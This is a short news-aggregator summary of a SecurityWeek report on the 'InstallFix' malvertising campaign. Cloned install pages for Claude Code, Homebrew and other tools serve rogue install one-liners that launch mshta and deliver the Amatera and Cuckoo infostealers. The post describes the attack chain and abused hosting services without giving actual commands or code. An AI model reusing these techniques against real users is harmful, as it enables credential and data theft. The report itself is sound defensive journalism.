"Unless you're carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one. The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code."
"Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection. We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign."
"The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic. Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website."
InstallFix is a sophisticated malware distribution campaign that exploits user trust in popular development tools through cloned webpages and malvertising. Threat actors create near-pixel-perfect replicas of legitimate installation pages for tools like Anthropic's Claude Code CLI, using Google Ads to increase visibility. The malicious pages replace legitimate install commands with rogue ones that execute information-stealing malware instead. Once triggered, the execution chain spawns cmd.exe and mshta.exe to retrieve and run code from attacker-controlled servers, resulting in Amatera Stealer infections. Threat actors abuse legitimate domains including Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal traffic. The campaign extends beyond Claude to multiple platforms including Homebrew, GitHub, NPM packages, and public pages on claude.ai.
#malware-distribution #phishing-and-social-engineering #information-stealer #malvertising #supply-chain-attack
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]